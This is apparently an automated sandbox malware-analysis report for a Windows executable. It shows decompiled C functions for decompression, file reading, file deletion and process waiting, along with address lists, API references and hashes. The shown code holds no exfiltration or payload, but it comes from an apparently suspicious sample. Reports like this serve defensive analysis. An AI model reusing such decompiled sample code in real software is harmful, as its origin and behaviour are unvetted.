												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00407068
0x00407068
0x0040706c
0x00407095
0x0040709f
0x0040706e
0x00407077
0x00407084
0x00407087
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40dbf9
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x00403489
0x0040349c
0x004034a1
0x004035d1
0x004035d3
0x00000000
0x004035d9
0x004034ad
0x004034c0
0x004034c6
0x004034cc
0x004034d7
0x004034dc
0x004034e1
0x004034e9
0x004034eb
0x004034eb
0x004034f4
0x004034fb
0x00000000
0x00000000
0x00403501
0x00403507
0x0040350d
0x00000000
0x00403513
0x00403519
0x00403539
0x0040353e
0x00403543
0x00403549
0x0040354f
0x00403559
0x00403560
0x00000000
0x00000000
0x00403562
0x00403568
0x0040356a
0x0040358d
0x00403593
0x00000000
0x00000000
0x00403595
0x00403597
0x00000000
0x00000000
0x00403599
0x00403599
0x004035ac
0x00000000
0x00000000
0x004035bb
0x00000000
0x004035bb
0x00403574
0x0040357b
0x004035c8
0x004035ce
0x004035ce
0x00000000
0x004035ce
0x0040357d
0x00403583
0x00403589
0x00000000
0x00000000
0x00000000
0x004035cc
0x004035cc
0x00000000
0x004035cc
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040348D

Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}

0x00405d2d
0x00405d38
0x00405d3d
0x00405d6d
0x00000000
0x00405d6d
0x00405d44
0x00405d45
0x00405d4f
0x00405d47
0x00405d47
0x00405d47
0x00405d57
0x00405d63
0x00405d67
0x00405d67
0x00000000
0x00405d59
0x00000000
0x00405d5b

APIs

Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}

0x00406af1
0x00406b08
0x00406afc
0x00406b06
0x00406b06
0x00406b13
0x00406b1f

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
GetExitCodeProcess.KERNELBASE ref: 00406B13

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
